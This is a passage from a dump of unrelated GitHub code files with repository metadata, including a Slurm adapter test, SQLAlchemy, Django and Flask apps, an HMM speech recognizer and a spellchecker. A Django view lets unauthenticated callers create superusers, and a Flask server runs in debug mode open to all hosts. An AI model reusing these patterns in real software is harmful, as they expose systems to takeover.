change\nsns.pairplot(X_train)\nsns.pairplot(X_train_sc)\nsns.pairplot(X_train_mms)\nplt.show()\n\n","repo_name":"MohammedShakeeb112/ml_Algo","sub_path":"featureScaling.py","file_name":"featureScaling.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
+{"seq_id":"8981870886","text":"from tests.utilities.utilities import async_return\nfrom tests.utilities.utilities import run_async\nfrom tardis.adapters.batchsystems.slurm import SlurmAdapter\nfrom tardis.utilities.attributedict import AttributeDict\n\nfrom tardis.adapters.batchsystems.slurm import slurm_status_updater\nfrom tardis.interfaces.batchsystemadapter import MachineStatus\n\nfrom tardis.exceptions.executorexceptions import CommandExecutionFailure\n\nfrom functools import partial\nfrom unittest.mock import MagicMock, patch\nfrom unittest import TestCase\n\n\nclass TestSlurmAdapter(TestCase):\n mock_config_patcher = None\n mock_async_run_command_patcher = None\n\n @classmethod\n def setUpClass(cls):\n cls.mock_config_patcher = patch(\n \"tardis.adapters.batchsystems.slurm.Configuration\"\n )\n cls.mock_async_run_command_patcher = patch(\n \"tardis.adapters.batchsystems.slurm.async_run_command\", new=MagicMock()\n )\n cls.mock_config = cls.mock_config_patcher.start()\n cls.mock_async_run_command = cls.mock_async_run_command_patcher.start()\n\n @classmethod\n def tearDownClass(cls):\n cls.mock_config_patcher.stop()\n cls.mock_async_run_command_patcher.stop()\n\n def setUp(self):\n self.cpu_ratio = 0.5\n self.memory_ratio = 0.25\n\n self.command = 'sinfo --Format=\"statelong,cpusstate,allocmem,memory,features,nodehost\" -e --noheader -r --partition=test_part' # noqa B950\n\n self.command_wo_options = 'sinfo --Format=\"statelong,cpusstate,allocmem,memory,features,nodehost\" -e --noheader -r' # noqa B950\n\n return_value = \"\\n\".join(\n [\n \"mixed 2/2/0/4 6000 24000 VM-1 host-10-18-1-1\",\n \"mixed 3/1/0/4 15853 22011 VM-2 host-10-18-1-2\",\n \"mixed 1/3/0/4 18268 22011 VM-3 host-10-18-1-4\",\n \"mixed 3/1/0/4 17803 22011 VM-4 host-10-18-1-7\",\n \"draining 0/4/0/4 17803 22011 draining_m draining_m\",\n \"idle 0/4/0/4 17803 22011 idle_m idle_m\",\n \"drained 0/4/0/4 17803 22011 drained_m drained_m\",\n \"powerup 0/4/0/4 17803 22011 pwr_up_m pwr_up_m\",\n ]\n )\n\n self.mock_async_run_command.return_value = async_return(\n return_value=return_value\n )\n\n self.setup_config_mock(\n options=AttributeDict({\"long\": {\"partition\": \"test_part\"}})\n )\n\n 
self.slurm_adapter = SlurmAdapter()\n\n def tearDown(self):\n self.mock_async_run_command.reset_mock()\n\n def setup_config_mock(self, options=None):\n self.config = self.mock_config.return_value\n self.config.BatchSystem.max_age = 10\n if options:\n self.config.BatchSystem.options = options\n else:\n self.config.BatchSystem.options = {}\n\n def test_disintegrate_machine(self):\n self.assertIsNone(\n run_async(self.slurm_adapter.disintegrate_machine, drone_uuid=\"test\")\n )\n\n def test_drain_machine(self):\n run_async(self.slurm_adapter.drain_machine, drone_uuid=\"VM-1\")\n self.mock_async_run_command.assert_called_with(\n \"scontrol update NodeName=host-10-18-1-1 State=DRAIN Reason='COBalD/TARDIS'\"\n )\n\n self.mock_async_run_command.reset_mock()\n\n self.assertIsNone(\n run_async(self.slurm_adapter.drain_machine, drone_uuid=\"not_exists\")\n )\n self.mock_async_run_command.side_effect = CommandExecutionFailure(\n message=\"Does not exists\", exit_code=1, stderr=\"Does not exists\"\n )\n with self.assertRaises(CommandExecutionFailure):\n self.assertIsNone(\n run_async(self.slurm_adapter.drain_machine, drone_uuid=\"idle_m\")\n )\n\n self.mock_async_run_command.side_effect = None\n\n def test_drain_machine_without_options(self):\n self.setup_config_mock()\n self.slurm_adapter = SlurmAdapter()\n\n run_async(self.slurm_adapter.drain_machine, drone_uuid=\"VM-1\")\n self.mock_async_run_command.assert_called_with(\n \"scontrol update NodeName=host-10-18-1-1 State=DRAIN Reason='COBalD/TARDIS'\"\n )\n\n def test_integrate_machine(self):\n self.assertIsNone(\n run_async(self.slurm_adapter.integrate_machine, drone_uuid=\"VM-1\")\n )\n\n def test_get_resource_ratios(self):\n self.assertEqual(\n list(run_async(self.slurm_adapter.get_resource_ratios, drone_uuid=\"VM-1\")),\n [self.cpu_ratio, self.memory_ratio],\n )\n self.mock_async_run_command.assert_called_with(self.command)\n\n self.assertEqual(\n run_async(self.slurm_adapter.get_resource_ratios, drone_uuid=\"not_exists\"),\n {},\n )\n\n def test_get_resource_ratios_without_options(self):\n self.setup_config_mock()\n del self.config.BatchSystem.options\n self.slurm_adapter = SlurmAdapter()\n\n self.assertEqual(\n list(run_async(self.slurm_adapter.get_resource_ratios, drone_uuid=\"VM-1\")),\n [self.cpu_ratio, self.memory_ratio],\n )\n\n self.mock_async_run_command.assert_called_with(self.command_wo_options)\n\n def test_get_allocation(self):\n self.assertEqual(\n run_async(self.slurm_adapter.get_allocation, drone_uuid=\"VM-1\"),\n max([self.cpu_ratio, self.memory_ratio]),\n )\n self.mock_async_run_command.assert_called_with(self.command)\n\n self.assertEqual(\n run_async(self.slurm_adapter.get_allocation, drone_uuid=\"not_exists\"),\n 0.0,\n )\n\n def test_get_machine_status(self):\n state_mapping = {\n \"VM-1\": MachineStatus.Available,\n \"not_exists\": MachineStatus.NotAvailable,\n \"draining_m\": MachineStatus.Draining,\n \"idle_m\": MachineStatus.Available,\n \"drained_m\": MachineStatus.NotAvailable,\n \"pwr_up_m\": MachineStatus.NotAvailable,\n }\n\n for machine, state in state_mapping.items():\n self.assertEqual(\n run_async(self.slurm_adapter.get_machine_status, drone_uuid=machine),\n state,\n )\n\n self.mock_async_run_command.reset_mock()\n\n self.mock_async_run_command.side_effect = CommandExecutionFailure(\n message=\"Test\", exit_code=123, stderr=\"Test\"\n )\n with self.assertLogs(level=\"WARN\"):\n with self.assertRaises(CommandExecutionFailure):\n attributes = {\n \"Machine\": \"Machine\",\n \"State\": \"State\",\n \"Activity\": 
\"Activity\",\n \"TardisDroneUuid\": \"TardisDroneUuid\",\n }\n run_async(\n partial(\n slurm_status_updater,\n self.config.BatchSystem.options,\n attributes,\n )\n )\n self.mock_async_run_command.assert_called_with(self.command)\n\n self.mock_async_run_command.side_effect = None\n\n def test_get_utilisation(self):\n self.assertEqual(\n run_async(self.slurm_adapter.get_utilisation, drone_uuid=\"VM-1\"),\n min([self.cpu_ratio, self.memory_ratio]),\n )\n self.mock_async_run_command.assert_called_with(self.command)\n\n self.assertEqual(\n run_async(self.slurm_adapter.get_utilisation, drone_uuid=\"not_exists\"),\n 0.0,\n )\n\n def test_machine_meta_data_translation(self):\n self.assertEqual(\n AttributeDict(Cores=1, Memory=1000, Disk=1000),\n self.slurm_adapter.machine_meta_data_translation_mapping,\n )\n","repo_name":"stwunsch/tardis","sub_path":"tests/adapters_t/batchsystems_t/test_slurm.py","file_name":"test_slurm.py","file_ext":"py","file_size_in_byte":7781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"47"} +{"seq_id":"25032390579","text":"\"\"\"\nструктура таблиц для наглядности\nCREATE TABLE athelete(\n \"id\" integer primary key autoincrement,\n \"age\" integer,\n \"birthdate\" text,\n \"gender\" text,\n \"height\" real,\n \"name\" text,\n \"weight\" integer,\n \"gold_medals\" integer,\n \"silver_medals\" integer,\n \"bronze_medals\" integer,\n \"total_medals\" integer,\n \"sport\" text,\n \"country\" text);\nCREATE TABLE sqlite_sequence(name,seq);\nCREATE TABLE user(\n \"id\" integer primary key autoincrement,\n \"first_name\" text,\n \"last_name\" text,\n \"gender\" text,\n \"email\" text,\n \"birthdate\" text,\n \"height\" real);\n\"\"\"\n\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\nDB_PATH = \"sqlite:///sochi_athletes.sqlite3\"\nBase = declarative_base()\n\n\nclass User(Base):\n __tablename__ = 'user'\n\n id = sa.Column(sa.Integer, primary_key=True)\n first_name = sa.Column(sa.TEXT)\n last_name = sa.Column(sa.Text)\n gender = sa.Column(sa.Text)\n email = sa.Column(sa.Text)\n birthdate = sa.Column(sa.Text)\n height = sa.Column(sa.Float)\n\n\ndef connect_db():\n \"\"\"\n Устанавливает соединение к базе данных, создает таблицы, если их еще нет и возвращает объект сессии\n \"\"\"\n # создаем соединение к базе данных\n engine = sa.create_engine(DB_PATH)\n # создаем описанные таблицы\n Base.metadata.create_all(engine)\n # создаем фабрику сессию\n session = sessionmaker(engine)\n # возвращаем сессию\n return session()\n\n\ndef request_data():\n \"\"\"\n Запрашивает у пользователя данные и добавляет их в список users\n \"\"\"\n # запрашиваем у пользователя данные\n first_name = input(\"Введи своё имя: \")\n last_name = input(\"А теперь фамилию: \")\n gender = input(\"Пол: \")\n email = input(\"Адрес электронной почты: \")\n birthdat = input(\"День рождения, в формате ГГГГ-ММ-ДД: \")\n height = float(input(\"Рост в см, напр. 
175: \"))\n # создаем нового пользователя\n user = User(\n first_name=first_name,\n last_name=last_name,\n gender=gender,\n email=email,\n birthdate=birthdat,\n height=height\n )\n # возвращаем созданного пользователя\n return user\n\n\ndef main():\n \"\"\"\n Осуществляет взаимодействие с пользователем, обрабатывает пользовательский ввод\n \"\"\"\n session = connect_db()\n\n user = request_data()\n # добавляем нового пользователя в сессию\n session.add(user)\n # сохраняем все изменения, накопленные в сессии\n session.commit()\n print(\"Спасибо, данные сохранены!\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"belousovromnik/B4.12","sub_path":"users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":3162,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32890402584","text":"\"\"\"\n\"\"\"\n\nfrom __future__ import division\n\n\ndef get_toy_data():\n from learning.dataset import BarsData\n return BarsData(which_set=\"train\", n_datapoints=500)\n\ndef get_toy_model():\n from learning.models.rws import LayerStack\n from learning.models.sbn import SBN, SBNTop\n\n p_layers = [\n SBN( \n n_X=25,\n n_Y=10\n ),\n SBNTop(\n n_X=10,\n )\n ]\n q_layers = [\n SBN(\n n_X=10,\n n_Y=25,\n )\n ]\n model = LayerStack(\n p_layers=p_layers,\n q_layers=q_layers,\n )\n return model\n\n","repo_name":"jbornschein/reweighted-ws","sub_path":"learning/tests/toys.py","file_name":"toys.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"47"} +{"seq_id":"74354395661","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\ndef _take(ls):\n # List -> (Node, List)\n tmp = ls.next\n ls.next = None\n return (ls, tmp)\n\ndef merge_lists(l1, l2):\n head, tail = None, None\n # initialise head and tail\n if l1 and (not l2 or l1.val <= l2.val):\n head, l1 = _take(l1)\n elif l2 and (not l1 or l1.val > l2.val):\n head, l2 = _take(l2)\n tail = head\n # merge\n while l1 and l2:\n if l1.val <= l2.val:\n node, l1 = _take(l1)\n tail.next = node\n else: #l1.val > l2.val\n node, l2 = _take(l2)\n tail.next = node\n tail = tail.next\n if l1:\n tail.next = l1\n if l2:\n tail.next = l2\n return head\n\nclass Solution:\n def mergeTwoLists(self, l1, l2):\n \"\"\"\n :type l1: ListNode\n :type l2: ListNode\n :rtype: ListNode\n \"\"\"\n return merge_lists(l1, l2)\n","repo_name":"davll/practical-algorithms","sub_path":"LeetCode/21-merge_two_sorted_lists.py","file_name":"21-merge_two_sorted_lists.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16094037058","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .serializers import MyTokenObtainPairSerializer\nfrom rest_framework.permissions import IsAuthenticated,IsAdminUser\nfrom rest_framework_simplejwt.views import TokenObtainPairView\nfrom .models import CustomAccountManager\nfrom django.forms.models import model_to_dict\n\n\nclass MyTokenObtainPairView(TokenObtainPairView):\n serializer_class = MyTokenObtainPairSerializer\n# create user\nclass CreateUser(APIView):\n permission_classes = ()\n \n def post(self, request):\n try:\n dataReq = request.data \n temp = CustomAccountManager().create_user(\n 
dataReq[\"user_name\"]\n , dataReq[\"password\"]\n , is_dev = dataReq[\"is_dev\"]\n , email = dataReq[\"email\"]\n , company = dataReq[\"company\"]\n )\n if temp is None:\n response = \"User existed\"\n else:\n response = \"User Created 🙂\" \n return Response(response)\n except:\n response = \"Server error please contact admin\"\n return Response(response, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n# create super user\nclass CreateSuperUser(APIView):\n permission_classes = ()\n \n def post(self, request):\n # GET data example\n dataReq = request.data\n try:\n CustomAccountManager().create_superuser(dataReq[\"user_name\"], dataReq[\"password\"],is_dev = dataReq[\"is_dev\"] == \"true\")\n return Response(\"UserCreated\")\n except:\n response = \"Server error please contact admin\"\n return Response(response, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n \n \n ","repo_name":"dominhgiangbboy/django-nuxt-paranormal","sub_path":"back_end_project/fukakachi/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"71269959824","text":"from django import forms\n\nfrom .models import Menu, Item, Ingredient\n\n\nclass MenuForm(forms.ModelForm):\n class Meta:\n model = Menu\n exclude = ('created_date',)\n\n\nclass ChangeMenuForm(forms.ModelForm):\n \"\"\"form to create and change menu \"\"\"\n\n class Meta:\n model = Menu\n exclude = ('created_date',)\n items_field = forms.ModelMultipleChoiceField(\n queryset=Item.objects.all())\n\n def save(self):\n signup = forms.ModelForm.save(self)\n for item in self.cleaned_data['items_field']:\n signup.item_set.add(item)\n\n\nclass ItemEditForm(forms.ModelForm):\n \"\"\"form to edit item \"\"\"\n\n class Meta:\n model = Item\n exclude = ('chef', 'created_date')\n ingredients_field = forms.ModelMultipleChoiceField(\n queryset=Ingredient.objects.all())\n\n def save(self):\n signup = forms.ModelForm.save(self)\n for ingredient in self.cleaned_data['ingredients_field']:\n signup.item_set.add(ingredient)\n","repo_name":"Curtis-S/debug_project","sub_path":"menu/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"1502979478","text":"\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):\n self.val = val\n self.left = left\n self.right = right\n self.next = next\n\"\"\"\n\nclass Solution:\n def connect(self, root: 'Optional[Node]') -> 'Optional[Node]':\n # 在从左到右遍历第N-1层的时候,我们就尽量把第N层的指针设置好,属于一个父节点的直接就可以设置,如果不属于同一个父节点,那么就设计相邻第N-1层相邻两个节点之间的处理。\n if root == None: return\n\n level_start = root\n cur = root\n while cur.left != None:\n cur.left.next = cur.right\n if cur.next == None:\n # Reach right end.\n tmp = level_start\n while tmp.next != None:\n tmp.right.next = tmp.next.left\n tmp = tmp.next\n cur = level_start.left\n level_start = cur\n else: \n cur = cur.next\n \n return root","repo_name":"LidaGuo1999/Coding_Solution","sub_path":"Leetcode/python/116-填充每个节点的下一个右侧节点指针.py","file_name":"116-填充每个节点的下一个右侧节点指针.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"31976682138","text":"import flask\nimport sqlite3\n\nfrom flask import request\n\nfrom src.db_conn import DbManager\nfrom src import EuclideanDistanceScore as 
euc\napp = flask.Flask(__name__)\napp.config[\"DEBUG\"] = True\ndb = DbManager(\"db_file/mydb\")\n\n\n\n@app.route('/', methods=['GET'])\ndef home():\n return \"Selam Sanem\"\n\n@app.route('/login', methods=['POST', 'GET'])\ndef login():\n if request.method == 'POST':\n if valid_login(request.form['username'],\n request.form['password']):\n print({\"Login\":\"Successful\",\"user\":db.get_user_info(request.form['username']),\"gameinfo\":db.get_user_game_info(request.form['username'])})\n return {\"Login\":\"Successful\",\"user\":db.get_user_info(request.form['username']),\"gameinfo\":db.get_user_game_info(request.form['username'])}\n else:\n return {\"Login\":\"Failed\"}\n\n@app.route('/getuserinfo/', methods=['POST', 'GET'])\ndef getuserinfo(username):\n return db.get_user_info(username)\n\n@app.route('/gettestusers', methods=['POST', 'GET'])\ndef gettestusers():\n return {\"Users\":[\"umit\",\"gizem\",\"sanem\"]}\n\n@app.route('/getfriendsuggestion/', methods=['POST', 'GET'])\ndef getfriendsuggestion(username):\n user_data = db.get_user_game_interes()\n gamedatas = {}\n result=[]\n for data in user_data:\n if (data[0] is not None and data[1] is not None and data[2] is not None and data[3] is not None):\n user_score = int(data[3])\n user_name = data[0]\n user_level = int(data[2])\n game = data[1]\n gamedata = {\n user_name: {game: user_level, \"game\": int(game.replace(\"-\", \"\").replace(\" \", \"\").replace(\"'\", \"\"), 36)}}\n gamedatas.update(gamedata)\n friendlist = euc.topMatches(gamedatas,username, n=5)\n for friend in friendlist:\n user_info=db.get_user_game_info(str(friend[1]))\n result.append(\"Username:\"+user_info[\"username\"]+\" Game:\"+user_info[\"game\"]+\" Game Type:\"+user_info[\"gametype\"]+\" Game Level:\" +str(user_info[\"level\"]) )\n return {\"Users\":result}\n\n\n@app.route('/getusers', methods=['GET'])\ndef get_users():\n query= \"select * from users\"\n db.execute_query(query)\n return \"success\"\n\n@app.route('/adduser', methods=['GET', 'POST'])\ndef add_user():\n content = request.form\n if(db.add_user(content)):\n return \"Success\"\n else:\n return \"Failed, check if all fields exist\"\n@app.route('/addgame', methods=['GET', 'POST'])\ndef add_game():\n content = request.json\n if(db.add_game(content)):\n return {\"Result\":\"Success\"}\n else:\n return {\"Result\":\"Fail\"}\n\n\n@app.route('/addgametouser/', methods=['GET', 'POST'])\ndef addgametouser(username):\n content = request.json\n if (db.add_game_to_user(username,content)):\n return \"Success\"\n else:\n return \"Failed, check if all fields exist\"\n\n@app.route('/getusergameinfo/', methods=['GET', 'POST'])\ndef getusergameinfo(username):\n if (db.get_user_game_info(username)):\n return db.get_user_game_info(username)\n else:\n return {\"Result\":\"Failed\"}\n\n\ndef valid_login(username,password):\n result=db.get_username_password(username,password)\n if len(result)>0:\n return True\n else:\n return False\n\nif __name__ == \"__main__\":\n app.run(host= '0.0.0.0')","repo_name":"sanemeroglu/Gameify_server1","sub_path":"flask-server2/src/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74832916302","text":"\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport numpy as np\nN = int(sys.argv[1])\n\ngeneral_directory = \"results/general_algorithm/tables/\"\ngeneral_table = \"n_vs_time_general.txt\"\n\nspecial_directory = 
\"results/special_algorithm/tables/\"\nspecial_table = special_directory + \"n_vs_time_special.txt\"\n\nLU_directory = \"results/LU/tables/\"\nLU_table = LU_directory + \"n_vs_time_LU.txt\"\n\ngeneral_time = []\nspecial_time = []\nLU_time = []\nnumber_of_gridpoints = [int(10**i) for i in range(1,N+1)]\n\nfilepath = os.path.join(general_directory, general_table)\ninfile = open(filepath)\ninfile.readline()\nlines = infile.readlines()\nfor line in lines:\n numbers = line.split()\n general_time.append(float(numbers[-1]))\ninfile.close()\n\nwith open(special_table, \"r\") as infile:\n infile.readline()\n lines = infile.readlines()\n for line in lines:\n numbers = line.split()\n special_time.append(float(numbers[-1]))\n\nwith open(LU_table, \"r\") as infile:\n infile.readline()\n lines = infile.readlines()\n for line in lines:\n numbers = line.split()\n LU_time.append(float(numbers[-1]))\n\noutfilename = \"n_vs_time_all_algorithms.txt\"\nwith open(outfilename, \"w\") as outfile:\n outfile.write(\"n\" + \" \" + \"general\" + \" \" + \"special\" + \" \" + \"LU\" + \"\\n\")\n for n, general, special, lu in zip(number_of_gridpoints, general_time, special_time, LU_time):\n outfile.write(str(\"%.1E\" % n) + \" \" + str(\"%f\" % general) + \" \" + str(\"%f\" % special) + \" \" + str(\"%f\" % lu) + \"\\n\")\n\nresults_directory = \"~/Documents/skole/comphys/projects/project1/codes/results/\"\nos.system(\"mv\" + \" \" + outfilename + \" \" + results_directory)\n","repo_name":"benedibn/comphys","sub_path":"projects/project1/codes/create_benchmark_table.py","file_name":"create_benchmark_table.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29968473394","text":"import pynini\nfrom nemo_text_processing.text_normalization.zh.graph_utils import GraphFst,insert_space,NEMO_DIGIT,NEMO_CHAR\nfrom pynini.lib import pynutil\n\nclass Fraction(GraphFst):\n '''\n 1/5 -> tokens { fraction { numerator: \"1\" denominator: \"5\" } }\n '''\n def __init__(self, deterministic: bool = True, lm: bool = False):\n super().__init__(name=\"fraction\", kind=\"classify\", deterministic=deterministic)\n\n numerator = pynini.closure(NEMO_DIGIT,1) + pynutil.delete('/')\n denominator = pynini.closure(NEMO_DIGIT,1)\n graph = (\n pynutil.insert(\"numerator: \\\"\") \n + numerator \n + pynutil.insert(\"\\\"\") + insert_space \n + pynutil.insert(\"denominator: \\\"\") \n + denominator \n + pynutil.insert(\"\\\"\") \n )\n\n self.fst = self.add_tokens(graph).optimize()\n","repo_name":"dophist/textnorm","sub_path":"zh/nemo_text_processing/text_normalization/zh/taggers/fraction.py","file_name":"fraction.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"8152016646","text":"import librosa\nimport numpy as np\nimport os\nimport math\nfrom sklearn.cluster import KMeans\nimport hmmlearn.hmm\n\ndef get_mfcc(file_path):\n y, sr = librosa.load(file_path) # read .wav file\n hop_length = math.floor(sr*0.010) # 10ms hop\n win_length = math.floor(sr*0.025) # 25ms frame\n # mfcc is 12 x T matrix\n mfcc = librosa.feature.mfcc(\n y, sr, n_mfcc=12, n_fft=1024,\n hop_length=hop_length, win_length=win_length)\n # substract mean from mfcc --> normalize mfcc\n mfcc = mfcc - np.mean(mfcc, axis=1).reshape((-1,1)) \n # delta feature 1st order and 2nd order\n delta1 = librosa.feature.delta(mfcc, order=1)\n delta2 = librosa.feature.delta(mfcc, order=2)\n # X is 
36 x T\n X = np.concatenate([mfcc, delta1, delta2], axis=0) # O^r\n # return T x 36 (transpose of X)\n return X.T # hmmlearn use T x N matrix\n\ndef get_class_data(data_dir):\n files = os.listdir(data_dir)\n mfcc = [get_mfcc(os.path.join(data_dir,f)) for f in files if f.endswith(\".wav\")]\n return mfcc\n\ndef clustering(X, n_clusters=10):\n kmeans = KMeans(n_clusters=n_clusters, n_init=50, random_state=0, verbose=0)\n kmeans.fit(X)\n print(\"centers\", kmeans.cluster_centers_.shape)\n return kmeans \n\nif __name__ == \"__main__\":\n class_names = [\"one\", \"two\", \"test_one\", \"test_two\"]\n dataset = {}\n for cname in class_names:\n print(f\"Load {cname} dataset\")\n dataset[cname] = get_class_data(os.path.join(\"data\", cname))\n\n # Get all vectors in the datasets\n all_vectors = np.concatenate([np.concatenate(v, axis=0) for k, v in dataset.items()], axis=0)\n print(\"vectors\", all_vectors.shape)\n # Run K-Means algorithm to get clusters\n kmeans = clustering(all_vectors)\n print(\"centers\", kmeans.cluster_centers_.shape)\n\n models = {}\n for cname in class_names:\n class_vectors = dataset[cname]\n # convert all vectors to the cluster index\n # dataset['one'] = [O^1, ... O^R]\n # O^r = (c1, c2, ... ct, ... cT)\n # O^r size T x 1\n dataset[cname] = list([kmeans.predict(v).reshape(-1,1) for v in dataset[cname]])\n hmm = hmmlearn.hmm.MultinomialHMM(\n n_components=6, random_state=0, n_iter=1000, verbose=True,\n startprob_prior=np.array([0.7,0.2,0.1,0.0,0.0,0.0]),\n transmat_prior=np.array([\n [0.1,0.5,0.1,0.1,0.1,0.1,],\n [0.1,0.1,0.5,0.1,0.1,0.1,],\n [0.1,0.1,0.1,0.5,0.1,0.1,],\n [0.1,0.1,0.1,0.1,0.5,0.1,],\n [0.1,0.1,0.1,0.1,0.1,0.5,],\n [0.1,0.1,0.1,0.1,0.1,0.5,],\n ]),\n )\n if cname[:4] != 'test':\n X = np.concatenate(dataset[cname])\n lengths = list([len(x) for x in dataset[cname]])\n print(\"training class\", cname)\n print(X.shape, lengths, len(lengths))\n hmm.fit(X, lengths=lengths)\n models[cname] = hmm\n print(\"Training done\")\n\n print(\"Testing\")\n for true_cname in class_names:\n for O in dataset[true_cname]:\n score = {cname : model.score(O, [len(O)]) for cname, model in models.items() if cname[:4] != 'test' }\n print(true_cname, score)\n\n","repo_name":"tqlong/voice-class","sub_path":"speech_recognition.py","file_name":"speech_recognition.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
+{"seq_id":"19718330614","text":"#!/usr/bin/env python\n\nfrom argparse import ArgumentParser\nfrom netCDF4 import Dataset as CDF\n \n# Set up the option parser\nparser = ArgumentParser()\nparser.description = '''Script adds CF-conforming mapping variable for EPSG:26710.'''\nparser.add_argument(\"FILE\", nargs=1)\noptions = parser.parse_args()\nargs = options.FILE\n\nnc = CDF(args[0], 'a')\n\nif \"mapping\" not in nc.variables.keys():\n mapping = nc.createVariable(\"mapping\", 'c')\nelse:\n mapping = nc.variables[\"mapping\"] # variables is a mapping, so index it rather than call it\n \nmapping.longitude_of_central_meridian = -123.0\nmapping.false_easting = 500000.0\nmapping.false_northing = 0.0\nmapping.grid_mapping_name = \"transverse_mercator\"\nmapping.inverse_flattening = 294.978698213898\nmapping.latitude_of_projection_origin = 0.0\nmapping.scale_factor_at_central_meridian = 0.9996\nmapping.semi_major_axis = 6378206.4\nmapping.unit = \"metre\"\n\nfor var in nc.variables.keys():\n if (nc.variables[var].ndim >= 2 and var not in ['lat', 'lon', 'lat_bnds', 'lon_bnds', 'lat_bounds', 'lon_bounds']):\n nc.variables[var].grid_mapping = 
\"mapping\"\n\nnc.close()\n","repo_name":"amandersillinois/pism-olympics","sub_path":"scripts/add_grid_mapping.py","file_name":"add_grid_mapping.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"34785001715","text":"from textblob import TextBlob, Word\nfrom spellchecker import SpellChecker\nfrom django.shortcuts import render, redirect\nfrom .forms import CheckForm\nfrom .models import Check\n\n\ndef text_views(request):\n if request.method == 'POST':\n form = CheckForm(request.POST)\n\n if form.is_valid():\n form.save()\n # return redirect('result')\n else:\n form = CheckForm()\n return render(request, 'check.html', {'form': form})\n\n\ndef result_views(request):\n qs = Check.objects.latest('time')\n\n tb = TextBlob(qs.text)\n spell = SpellChecker()\n res = {}\n ck = []\n for word in tb.words:\n word = word.lower()\n w = Word(word)\n # res.update({word})\n # if word != word.correct() and word != spell.correction(word):\n # res.update({word: spell.candidates(word)})\n\n val = w.spellcheck()\n\n if len(val) == 1:\n if word != val[0][0]:\n res[word] = [val[0][0]]\n else:\n if val[0][1] == 0.0:\n res[word] = ['Irrelevant spelling.']\n else:\n for it in val:\n ck.append(it[0])\n res[word] = ck\n ck = []\n\n return render(request, 'result.html', {'queryset': res})\n","repo_name":"na5imuzzaman/SpellChecker","sub_path":"checking/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72877095183","text":"\nimport turtle\nfrom turtle import *\nimport time\n\nturtle.title(\"LOVE\")\nttl = turtle.Turtle()\n\ndef curve():\n for i in range(200):\n ttl.right(1)\n ttl.forward(1)\n print(i)\n\ndef heart():\n ttl.fillcolor('red')\n ttl.begin_fill()\n ttl.left(140)\n ttl.forward(113)\n curve()\n ttl.left(120)\n curve()\n ttl.forward(112)\n ttl.end_fill()\n\ndef txt():\n ttl.up()\n ttl.setpos(-75, 78)\n ttl.down()\n ttl.color('white')\n ttl.write(\"SAD Happy\", font=(\n \"Verdana\", 16, \"bold\"))\n\nheart()\ntxt()\n\nttl.penup()\nttl.goto(50, 150)\nttl.pendown()\n\ndef drawing_rose(turtle, radius):\n heading = turtle.heading()\n turtle.circle(radius, 60)\n turtle.left(120)\n turtle.circle(radius, 60)\n turtle.setheading(heading)\nfor _ in range(9):\n ttl.color(\"black\", \"white\")\n ttl.begin_fill()\n drawing_rose(ttl, 60)\n ttl.left(360 / 9)\n ttl.end_fill()\n\n\ntime.sleep(1000)\n\n# To hide turtle\n# ttl.ht()","repo_name":"TMexe404/LatihanTurtle","sub_path":"main1.py","file_name":"main1.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"41446361761","text":"import numpy\nimport math\nfrom .config import chunk_size, sampling_rate\nfrom .EffectFFTFilter import CreateLowCutFilter, CreateHighCutFilter\n\nclass CreateDelay:\n \"\"\"Creating a Delay audio-effect class/device.\n\n Is overloaded with basic settings.\n This class introduces no latency\n\n Parameters\n ----------\n time_in_ms : int or float\n Sets the delay-time in milliseconds.\n feedback_loops : int or float\n Sets the amount of repetitions of the delay.\n lowcut_filter_frequency : int or float\n The frequency of the audio filter, if use_lowcut_filter is set to True\n highcut_filter_frequency : int or float\n The frequency of the audio filter, if use_highcut_filter is set to True\n use_lowcut_filter : bool\n If 
